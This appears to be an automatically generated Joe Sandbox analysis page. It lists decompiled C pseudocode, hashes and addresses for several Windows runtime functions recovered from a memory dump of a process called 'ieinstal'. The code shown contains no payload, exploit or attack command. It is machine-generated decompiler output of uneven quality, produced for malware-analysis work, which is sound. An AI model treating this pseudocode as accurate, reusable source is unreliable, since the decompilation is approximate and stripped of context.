Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f24faacacf20a247b0a620b10112a10cfbe795ddbbfdfcac05c0b659f5baaf
Instruction ID: 74d41c8a786bfc9c468f9575203e7d3ddfefee048fc4a8edb6e74550291e97e4
Opcode Fuzzy Hash: e1f24faacacf20a247b0a620b10112a10cfbe795ddbbfdfcac05c0b659f5baaf
Instruction Fuzzy Hash: 4A017CB5A00318AFCB00DFA9D941AEEBBF8FF48744F51406AF904E7340E674E9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1F07EE78 Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1F07EE78(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				void* __edi;
				void* __esi;
				signed char* _t16;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				signed int _t33;

				_t29 = __edx;
				_v8 =  *0x1f0bb370 ^ _t33;
				_t32 = __ecx;
				_t30 =  &_v48;
				_t24 = 0xa;
				memset(_t30, 0, _t24 << 2);
				_t31 = _t30 + _t24;
				_v16 = _t32;
				_v42 = 0x1036;
				_v12 = _t29;
				if(E1EFD3C40() == 0) {
					_t16 = 0x7ffe0380;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t22, _v8 ^ _t33, _t29, _t31, _t32);
			}

0x1f07ee78
0x1f07ee87
0x1f07ee8c
0x1f07ee8e
0x1f07ee95
0x1f07ee96
0x1f07ee96
0x1f07ee9d
0x1f07eea0
0x1f07eea4
0x1f07eeae
0x1f07eec0
0x1f07eeb0
0x1f07eeb9
0x1f07eeb9
0x1f07eecb
0x1f07eecc
0x1f07eece
0x1f07eed3
0x1f07eee6

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a109af9ca7628c670b51a75ed859d9e5f27257e1759e37b033bada3fad8d718
Instruction ID: 5985f261467a9b1964c7885073bb81cf5d4805d86ec24d5e89cbf5074e72e53d
Opcode Fuzzy Hash: 7a109af9ca7628c670b51a75ed859d9e5f27257e1759e37b033bada3fad8d718
Instruction Fuzzy Hash: B4F0A475A01758AFD704DBB9C405AEEB7B9EF44714F0088AAE510EB290DE74E9058764

Uniqueness

Uniqueness Score: -1.00%

Function 1F095D65 Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E1F095D65(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v66;
				char _v72;
				void* __edi;
				void* __esi;
				signed char* _t19;
				intOrPtr _t25;
				signed int _t33;

				_t30 = __edx;
				_v12 =  *0x1f0bb370 ^ _t33;
				_v40 = _v40 & 0x00000000;
				_t32 = _a12;
				_v36 = __edx;
				_v66 = 0x1c21;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1EFD3C40() == 0) {
					_t19 = 0x7ffe0386;
				} else {
					_t19 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x403);
				_push( *_t19 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t25, _v12 ^ _t33, _t30, 0x1c21, _t32);
			}

0x1f095d65
0x1f095d74
0x1f095d7d
0x1f095d82
0x1f095d8b
0x1f095d8e
0x1f095d92
0x1f095d95
0x1f095d98
0x1f095da2
0x1f095db4
0x1f095da4
0x1f095dad
0x1f095dad
0x1f095dbf
0x1f095dc0
0x1f095dc2
0x1f095dc7
0x1f095dda

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b865f4c8bb7ac555c73e1831c4a3f9256c8fa2c083b7d2aa050a93e49e390b69
Instruction ID: fe7ed6aea5fcc058a83e5be4f71ee7ee36a604df15d7c3026886e12458354c68
Opcode Fuzzy Hash: b865f4c8bb7ac555c73e1831c4a3f9256c8fa2c083b7d2aa050a93e49e390b69
Instruction Fuzzy Hash: 2D017C75A012489FDB00DFA9D445BEEBBF8BF48714F15006AE904AB380EB34AA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC1D50 Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1EFC1D50(void* __ecx, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				char* _t9;
				void* _t17;
				void* _t20;
				void* _t22;
				intOrPtr _t24;

				_t18 = __ecx;
				_push(__ecx);
				_t24 = _a4;
				if(_t24 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					_t9 = E1F094A6D(_t17, _t18, _t20, _t22, _t24);
				} else {
					_push(4);
					_push( &_a8);
					_push(5);
					_push( *((intOrPtr*)(_t24 + 0x24)));
					E1F0043A0();
					if(E1EFD3C40() != 0) {
						_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t9 = 0x7ffe0386;
					}
					if( *_t9 != 0) {
						_t9 = E1F094E03(_t24, _a8);
					}
				}
				return _t9;
			}

0x1efc1d50
0x1efc1d58
0x1efc1d5a
0x1efc1d5f
0x1efc1da8
0x1efc1d76
0x1efc1d76
0x1efc1d7b
0x1efc1d7c
0x1efc1d7e
0x1efc1d81
0x1efc1d8d
0x1f01f9b8
0x1efc1d93
0x1efc1d93
0x1efc1d93
0x1efc1d9b
0x1f01f9c7
0x1f01f9c7
0x1efc1d9b
0x1efc1da5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
Instruction ID: e30b7c80524a2ae9915036eeb4958347045aaeac9f0af96f0a77ea0ca5775b45
Opcode Fuzzy Hash: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
Instruction Fuzzy Hash: EB014436A14645AFD301EF04C810F0973E8EF40B29F218382EC948F280E734FDA08792

Uniqueness

Uniqueness Score: -1.00%

Function 1F094F7C Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E1F094F7C(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				signed char* _t24;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t38;

				_t35 = __edx;
				_v8 =  *0x1f0bb370 ^ _t38;
				_v24 = __ecx;
				_v58 = 0x1c30;
				_v32 =  *((intOrPtr*)(__edx + 0xc8));
				_v28 =  *((intOrPtr*)(__edx + 0xcc));
				_v16 =  *((intOrPtr*)(__edx + 0xd8));
				_v20 = __edx;
				_v12 =  *((intOrPtr*)(__edx + 0xd4));
				if(E1EFD3C40() == 0) {
					_t24 = 0x7ffe0386;
				} else {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v64);
				_push(0x18);
				_push(0x402);
				_push( *_t24 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t30, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x1f094f7c
0x1f094f8b
0x1f094f93
0x1f094f96
0x1f094fa0
0x1f094fa9
0x1f094fb2
0x1f094fbb
0x1f094fbe
0x1f094fc8
0x1f094fda
0x1f094fca
0x1f094fd3
0x1f094fd3
0x1f094fe5
0x1f094fe6
0x1f094fe8
0x1f094fed
0x1f094ffe

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae90169b49e5b176ad88cbc1326ca311d23644b39d3f6fdb62a87c2577722c5f
Instruction ID: a13083996d196de8fec668bd6b3ed397460317c6029904acdcbd41489ca5c267
Opcode Fuzzy Hash: ae90169b49e5b176ad88cbc1326ca311d23644b39d3f6fdb62a87c2577722c5f
Instruction Fuzzy Hash: 06011E74E0020ADFDB04DFA9C555B9EF7F4FF08304F1582A9A518EB381EB34AA408B94

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEFDE0 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFEFDE0() {
				void* __ecx;
				void* _t15;
				intOrPtr* _t17;

				L1EFD2330(0xd, 0x9b387660);
				_t17 =  *0x1f0b49c0; // 0x0
				if(_t17 != 0) {
					 *0x1f0b49c0 =  *_t17;
					 *0x1f0b49c4 =  *0x1f0b49c4 + 0xffff;
				}
				E1EFD24D0(0x9b387660);
				if(_t17 == 0) {
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L3;
					} else {
						return E1EFD5D90(_t15, _t10, 0, 0x20);
					}
				} else {
					L3:
					return _t17;
				}
			}

0x1efefdf8
0x1efefdfd
0x1efefe05
0x1efefe09
0x1efefe13
0x1efefe13
0x1efefe1b
0x1efefe22
0x1efefe30
0x1efefe35
0x00000000
0x1efefe37
0x1efefe44
0x1efefe44
0x1efefe24
0x1efefe24
0x1efefe29
0x1efefe29

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8156ea6ddbe919d17e4c86b75c98176bc7e7245aa72274c3423d80b3cad0aca7
Instruction ID: a0fa831c7d7d844d9cdcd50a1d53f18b0ee72bd25d107ef07e24a79bd5a4e6cc
Opcode Fuzzy Hash: 8156ea6ddbe919d17e4c86b75c98176bc7e7245aa72274c3423d80b3cad0aca7
Instruction Fuzzy Hash: D7F0BB7FB0226197D2108E5CB8A0B6A3354E7C4F21F170365FD00EB742D714F911E6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1F063EFC Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F063EFC(intOrPtr* __ecx) {
				intOrPtr _t8;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr* _t16;

				_t15 = __ecx;
				if(__ecx == 0) {
					L8:
					return 0;
				}
				_t16 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t16 == 0) {
					goto L8;
				}
				_t11 =  *_t15;
				if( *_t15 == 0) {
					L4:
					_t12 =  *((intOrPtr*)(_t15 + 4));
					if( *((intOrPtr*)(_t15 + 4)) == 0) {
						L7:
						return _t16;
					}
					_t8 = E1F07B33D(_t12);
					 *((intOrPtr*)(_t16 + 4)) = _t8;
					if(_t8 != 0) {
						goto L7;
					}
					L6:
					E1EFFBD71(_t8, _t16, _t14);
					_t16 = 0;
					goto L7;
				}
				_t8 = E1EFE5E34(_t11);
				 *_t16 = _t8;
				if(_t8 == 0) {
					goto L6;
				}
				goto L4;
			}

0x1f063f00
0x1f063f04
0x1f063f4f
0x00000000
0x1f063f4f
0x1f063f18
0x1f063f1c
0x00000000
0x00000000
0x1f063f1e
0x1f063f22
0x1f063f2f
0x1f063f2f
0x1f063f34
0x1f063f4b
0x00000000
0x1f063f4b
0x1f063f36
0x1f063f3b
0x1f063f40
0x00000000
0x00000000
0x1f063f42
0x1f063f44
0x1f063f49
0x00000000
0x1f063f49
0x1f063f24
0x1f063f29
0x1f063f2d
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 197a8c067fa2224d7c4f2d323e01aff28fba10e97c9d540b61f1ec7de288950a
Instruction ID: 74903979af1e2bf92271e6b2dcf534dbbeb0cfe2e18c88010695201d2f3b246c
Opcode Fuzzy Hash: 197a8c067fa2224d7c4f2d323e01aff28fba10e97c9d540b61f1ec7de288950a
Instruction Fuzzy Hash: 6FF05E3A341B5296D765DB298424BAB77E5AF90E20F02066DA895CB752EF20FC0187D0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBFD20 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBFD20() {
				intOrPtr _t8;
				intOrPtr* _t12;
				intOrPtr* _t14;

				_t14 = _t12;
				if( *0x1f0b49c4 >= 0xa) {
					if(_t14 >= 0x1f0b49e0) {
						if(_t14 < 0x1f0b4ae0) {
							goto L1;
						} else {
							goto L3;
						}
					} else {
						L3:
						return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
					}
				} else {
					L1:
					L1EFD2330(0xd, 0x9b387660);
					_t8 =  *0x1f0b49c0; // 0x0
					 *_t14 = _t8;
					 *0x1f0b49c4 =  *0x1f0b49c4 + 1;
					 *0x1f0b49c0 = _t14;
					return E1EFD24D0(0x9b387660);
				}
			}

0x1efbfd2d
0x1efbfd2f
0x1efbfd6d
0x1efbfd8a
0x00000000
0x1efbfd8c
0x00000000
0x1efbfd8c
0x1efbfd6f
0x1efbfd6f
0x1efbfd83
0x1efbfd83
0x1efbfd31
0x1efbfd31
0x1efbfd44
0x1efbfd49
0x1efbfd4e
0x1efbfd50
0x1efbfd58
0x1efbfd66
0x1efbfd66

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9520a216d6d228970ecd5fd9a58736728a637d3ce8b0042d23a56e0f5de7bd
Instruction ID: 8f40e882981eaec12d50e9dc422f24b0db53cb2d1bff2dac6d867966b9e4bfee
Opcode Fuzzy Hash: ea9520a216d6d228970ecd5fd9a58736728a637d3ce8b0042d23a56e0f5de7bd
Instruction Fuzzy Hash: 91F02B3FA321B15BD320AF49ACD0A89B724F795771B13075AED4187141D7614695D280

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBBF70 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1EFBBF70(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _t10;
				char _t20;
				intOrPtr _t22;

				_t10 = _a4;
				_t22 = 0;
				_t20 =  *((intOrPtr*)(_t10 + 0x14));
				_v12 = _t20;
				if(_t20 != 0) {
					if( *((intOrPtr*)(_t10 + 8)) == 0) {
						_v8 =  *((intOrPtr*)(_t10 + 0x1c)) - _t20;
						_push(0x8000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t22 = E1F002B90();
					} else {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t20);
					}
				}
				return _t22;
			}

0x1efbbf77
0x1efbbf7b
0x1efbbf7d
0x1efbbf80
0x1efbbf85
0x1f01d31c
0x1f01d338
0x1f01d33e
0x1f01d343
0x1f01d347
0x1f01d348
0x1f01d34f
0x1f01d31e
0x1f01d329
0x1f01d329
0x1f01d31c
0x1efbbf8f

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
Instruction ID: 57c160ef42b879cde34bad060b573cf9f03c09e3ef7273b7194c7f2a6ab74c93
Opcode Fuzzy Hash: d6a04297581aac59768f63668ebe9c51df94fd1ef3ae79eef58bf8edee963ecc
Instruction Fuzzy Hash: 55F09072505118FFC714DF99CD50E9EBBA8EB04750B10426AB506DB250D630ED40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F07EF66 Relevance: .0, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1F07EF66(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1f0bb370 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E1EFD3C40() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x1f07ef66
0x1f07ef75
0x1f07ef7b
0x1f07ef81
0x1f07ef89
0x1f07ef8c
0x1f07ef8f
0x1f07ef9a
0x1f07efac
0x1f07ef9c
0x1f07efa5
0x1f07efa5
0x1f07efb7
0x1f07efb8
0x1f07efba
0x1f07efbf
0x1f07efd0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fab0dc395a19c0ddc526924c12c9ab27dd12c38f62c7144a5c2ad39f3bfa57b
Instruction ID: 498fd019a050e48be67d959cb0b776693ea54602df4b13a6ba240e40d113b0f7
Opcode Fuzzy Hash: 9fab0dc395a19c0ddc526924c12c9ab27dd12c38f62c7144a5c2ad39f3bfa57b
Instruction Fuzzy Hash: ACF03CB4A01648AFCB04EFA9D545A9EB7F4EF08704F0080A9F945EB381EA74EA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1F001B0F Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E1F001B0F(void* __ecx, void* __edx) {
				signed int _t9;
				intOrPtr _t16;

				if( *0x1f0b41d4 != 0) {
					L5:
					return 0;
				} else {
					_t16 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x200);
					if(_t16 == 0) {
						return 0x5aa;
					} else {
						_t9 = 0;
						do {
							 *((intOrPtr*)(_t16 + _t9 * 8)) = 1;
							_t9 = _t9 + 1;
						} while (_t9 < 0x40);
						asm("lock cmpxchg [esi], ecx");
						if(0 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t16);
						}
						goto L5;
					}
				}
			}

0x1f001b17
0x1f001b58
0x1f001b5b
0x1f001b19
0x1f001b2e
0x1f001b32
0x1f001b62
0x1f001b34
0x1f001b34
0x1f001b36
0x1f001b36
0x1f001b3d
0x1f001b3e
0x1f001b4c
0x1f001b52
0x1f039d6a
0x1f039d6a
0x00000000
0x1f001b52
0x1f001b32

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26d332c0be28fad596b96abc2bb1378c27d621431c76db2a2d224f007171191
Instruction ID: f4ef77262876fcee3d461c2fbfdd1990f21d3135cf35b793b9113869aed04f56
Opcode Fuzzy Hash: e26d332c0be28fad596b96abc2bb1378c27d621431c76db2a2d224f007171191
Instruction Fuzzy Hash: C8F0E234744A92EAF322EF289D10B4632E2FB50740F150878E545DB1A0E724E9918780

Uniqueness

Uniqueness Score: -1.00%

Function 1F07FC95 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1F07FC95(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E1F07D919(__ecx);
				_t19 =  *0x1f0b6628 - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1f0b6960; // 0x0
					if(__eflags <= 0) {
						E1F07F82B();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1f0b6938 & 0x00000004;
							if(( *0x1f0b6938 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1f0b6938; // 0x0
					return E1F076B77(__ebx, 0xc0000374, 0x1f0b3960, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x1f07fc98
0x1f07fc9a
0x1f07fc9f
0x1f07fca5
0x1f07fcc6
0x1f07fccc
0x1f07fcce
0x1f07fcd9
0x1f07fcdc
0x1f07fcde
0x1f07fceb
0x1f07fceb
0x1f07fcf2
0x1f07fcf4
0x00000000
0x1f07fcf4
0x1f07fce0
0x1f07fce5
0x1f07fce7
0x1f07fce9
0x00000000
0x00000000
0x1f07fce9
0x1f07fcde
0x1f07fcf6
0x1f07fca7
0x1f07fca7
0x1f07fcc5
0x1f07fcc5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2747b7ca73b6d040309a259c45f0dba2ae3eef39f15e5542dec2b99bdb6264b
Instruction ID: 725b9c17551f780a2eeb40b3fda7dc0ee7a961a2c3bc384f4955b1548037d403
Opcode Fuzzy Hash: d2747b7ca73b6d040309a259c45f0dba2ae3eef39f15e5542dec2b99bdb6264b
Instruction Fuzzy Hash: F9F027BF4063D746C711DB287AA03C07BD5A745120F650ACECEE21B300CD35A593D2AC

Uniqueness

Uniqueness Score: -1.00%

Function 1F094F1D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1F094F1D(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1f0bb370 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E1EFD3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1F004B50(E1F002F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x1f094f1d
0x1f094f2c
0x1f094f34
0x1f094f37
0x1f094f3b
0x1f094f45
0x1f094f57
0x1f094f47
0x1f094f50
0x1f094f50
0x1f094f62
0x1f094f63
0x1f094f65
0x1f094f6a
0x1f094f7b

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30c3e67422b202c6e54bf7d90562a9fa192e2fedced9f8c75c583846c0482cf
Instruction ID: 0739f28346e0a43ebc0ad15bf10ff54c807a35ed3ec4f35d5a30a0dad3a7968a
Opcode Fuzzy Hash: f30c3e67422b202c6e54bf7d90562a9fa192e2fedced9f8c75c583846c0482cf
Instruction Fuzzy Hash: 9FF05478A007489FD704EBB9D555FADB7F4AF04704F1184A9F515EB281EA34E9009754

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFCEA0 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFFCEA0(signed int _a4, intOrPtr _a8) {
				char* _t12;
				intOrPtr _t19;

				_t19 = _a8;
				if(E1EFD3C40() != 0) {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t12 = 0x7ffe0386;
				}
				if( *_t12 != 0) {
					E1F094B67( *((intOrPtr*)(_t19 - 0x1c)), _t19,  *((intOrPtr*)(_t19 - 0x48)),  *((intOrPtr*)(_t19 - 0x44)),  *((intOrPtr*)(_t19 - 0x3c)));
				}
				return E1EFC5622(_a4, _t19 - 0x78, 0x102);
			}

0x1effcea7
0x1effceb1
0x1f03892a
0x1effceb7
0x1effceb7
0x1effceb7
0x1effcebf
0x1f038942
0x1f038942
0x1effced8

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
Instruction ID: 14b564f35fef82304a986cb3e2677990d7e665d3215ea8a5344e15957871a152
